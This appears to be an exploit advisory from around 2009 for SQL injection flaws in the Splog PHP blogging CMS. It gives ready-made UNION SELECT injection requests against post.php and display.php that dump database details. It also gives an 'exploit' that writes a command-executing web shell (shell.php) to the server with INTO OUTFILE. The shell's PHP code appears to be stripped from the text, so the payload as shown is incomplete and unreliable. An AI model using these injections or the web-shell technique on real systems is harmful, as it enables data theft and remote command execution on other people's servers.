|
|
-----------------------------------------------------------------=0D
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->=0D
-----------------------------------------------------------------=0D
=0D
CMS INFORMATION:=0D
=0D
-->WEB: http://sourceforge.net/projects/splog/=0D
-->DOWNLOAD: http://sourceforge.net/projects/splog/=0D
-->DEMO: N/A=0D
-->CATEGORY: CMS / Blogging=0D
-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing=0D
full integration into a website by being designed for use...=0D
-->RELEASED: 2009-06-01=0D
=0D
CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3=0D
-->DORK: N/A=0D
-->CATEGORY: SQL INJECTION=0D
-->AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns)=0D
-->Discovered Bug date: 2009-06-08=0D
-->Reported Bug date: 2009-06-09=0D
-->Fixed bug date: 2009-06-10=0D
-->Info patch (1.3): http://sourceforge.net/projects/splog/=0D
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)=0D
=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
SQL INJECTION (SQLi):=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
-------------------=0D
PROOF OF CONCEPT:=0D
-------------------=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>=0D
=0D
=0D
=0D
[++] GET var --> 'id'=0D
=0D
[++] File vuln --> 'post.php'=0D
=0D
=0D
~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23=0D
=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>=0D
=0D
=0D
[++] POST var --> 'pCategory'=0D
=0D
[++] File vuln --> 'display.php'=0D
=0D
=0D
POST http://[HOST]/[PATH]/display.php HTTP/1.1=0D
Host: [HOST]=0D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10=0D
Referer: http://[HOST]/[PATH]/display.php=0D
Content-Type: application/x-www-form-urlencoded=0D
pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION=0D
=0D
=0D
[++[Return]++] ~~~~~> user, version or database.=0D
=0D
=0D
----------=0D
EXPLOIT:=0D
----------=0D
=0D
=0D
<<<<---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++--------->>>>=0D
=0D
=0D
[GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'
YOUR SHELL IS ON!
','Get var (cmd) to execute comands. Enjoy it!
','Command Result:
','
','By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23=0D
=0D
[POST]~~~~~>=0D
=0D
POST http://[HOST]/[PATH]/display.php HTTP/1.1=0D
Host: [HOST]=0D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10=0D
Referer: http://[HOST]/[PATH]/display.php=0D
Content-Type: application/x-www-form-urlencoded=0D
pCategory=-1'+UNION+ALL+SELECT+'YOUR SHELL IS ON!
','Get var (cmd) to execute comands. Enjoy it!
','Command Result:
','
','By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# <--- INJECTION=0D
=0D
=0D
[++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php=0D
=0D
=0D
=0D
=0D
#######################################################################=0D
#######################################################################=0D
##*******************************************************************##=0D
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##=0D
##*******************************************************************##=0D
##-------------------------------------------------------------------##=0D
##*******************************************************************##=0D
## GREETZ TO: SPANISH H4ck3Rs community! ##=0D
##*******************************************************************##=0D
#######################################################################=0D
#######################################################################